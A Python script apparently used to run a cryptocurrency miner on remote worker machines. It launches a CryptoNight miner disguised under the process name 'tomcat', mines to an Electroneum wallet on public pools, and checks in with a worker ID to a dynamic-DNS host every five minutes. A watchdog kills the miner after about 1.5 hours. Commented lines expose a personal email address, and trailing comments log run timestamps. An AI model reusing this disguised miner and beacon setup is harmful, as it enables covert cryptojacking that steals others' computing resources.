import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:05.138446
#2018-02-17 16:34:02.992782
#2018-02-17 18:22:06.362823
#2018-02-17 20:10:05.728273
#2018-02-17 21:57:04.558346
#2018-02-17 23:42:06.269496
#2018-02-18 01:32:03.757547
#2018-02-18 03:18:01.739173
#2018-02-18 05:07:04.872410
#2018-02-18 06:58:03.232649
#2018-02-18 08:46:06.552376
#2018-02-18 10:33:06.367360
#2018-02-18 12:18:02.122281
#2018-02-18 14:05:06.126920
#2018-02-18 15:56:07.095835
#2018-02-18 17:46:04.006574
#2018-02-18 19:34:04.209570
#2018-02-18 21:19:03.384635
#2018-02-18 23:07:07.123244
#2018-02-19 00:54:04.018566
#2018-02-19 02:41:01.996220
#2018-02-19 04:28:04.692396
#2018-02-19 06:13:06.831215
#2018-02-19 08:01:05.769286
#2018-02-19 09:51:04.937290
#2018-02-19 11:39:02.149247
#2018-02-19 13:25:09.434362
#2018-02-19 15:13:07.368947
#2018-02-19 17:01:06.084541
#2018-02-19 18:47:05.538252
#2018-02-19 20:35:05.190181
#2018-02-19 22:21:08.260425
#2018-02-20 00:09:05.215647
#2018-02-20 01:56:07.097769
#2018-02-20 03:47:06.318287
#2018-02-20 05:33:06.841255
#2018-02-20 07:17:07.131098
#2018-02-20 09:04:05.358135
#2018-02-20 10:46:06.869788
#2018-02-20 12:32:06.955387
#2018-02-20 14:19:05.838904
#2018-02-20 16:02:09.149405
#2018-02-20 17:50:06.961170
#2018-02-20 19:41:06.672786
#2018-02-20 21:29:04.322544
#2018-02-20 23:13:06.975335
#2018-02-21 00:58:06.493683
#2018-02-21 02:44:07.881898
#2018-02-21 04:33:04.219332
#2018-02-21 06:21:06.390889
#2018-02-21 08:06:07.487418
#2018-02-21 09:52:04.621877
#2018-02-21 11:40:09.576052
#2018-02-21 13:31:01.235509
#2018-02-21 15:16:09.729775
#2018-02-21 17:06:11.157981
#2018-02-21 18:54:09.069139
#2018-02-21 20:43:08.305643
#2018-02-21 22:27:07.945928
#2018-02-22 00:18:06.494730
#2018-02-22 02:08:01.294865
#2018-02-22 03:54:02.164494
#2018-02-22 05:40:07.568033
#2018-02-22 07:25:03.836201
#2018-02-22 09:13:06.551241
#2018-02-22 11:01:01.535556
#2018-02-22 12:46:06.405523
#2018-02-22 14:32:08.488744
#2018-02-22 16:19:08.609828
#2018-02-22 18:07:05.427375
#2018-02-22 19:56:01.296732
#2018-02-22 21:45:09.943011
#2018-02-22 23:33:05.192703
#2018-02-23 01:21:07.063179
#2018-02-23 03:08:05.420205
#2018-02-23 04:54:05.822775
#2018-02-23 06:40:06.544170
#2018-02-23 08:29:04.735343
#2018-02-23 10:44:06.404983
#2018-02-23 12:41:05.545616
#2018-02-23 14:26:06.008186
#2018-02-23 16:17:08.655673
#2018-02-23 18:04:07.140549
#2018-02-23 19:49:04.863766
#2018-02-23 21:33:04.298647
#2018-02-23 23:21:01.769026
#2018-02-24 01:13:06.385183
#2018-02-24 03:05:07.948982
#2018-02-24 04:51:04.049007
#2018-02-24 06:35:05.995211
#2018-02-24 08:24:06.488263
#2018-02-24 10:11:06.770102
#2018-02-24 12:06:07.674800
#2018-02-24 13:53:07.143519
#2018-02-24 15:42:06.263622
#2018-02-24 17:35:02.529523
#2018-02-24 19:21:05.724308
#2018-02-24 21:12:06.443261
#2018-02-24 23:45:08.286617
#2018-02-25 03:06:06.722341
#2018-02-25 06:51:07.261859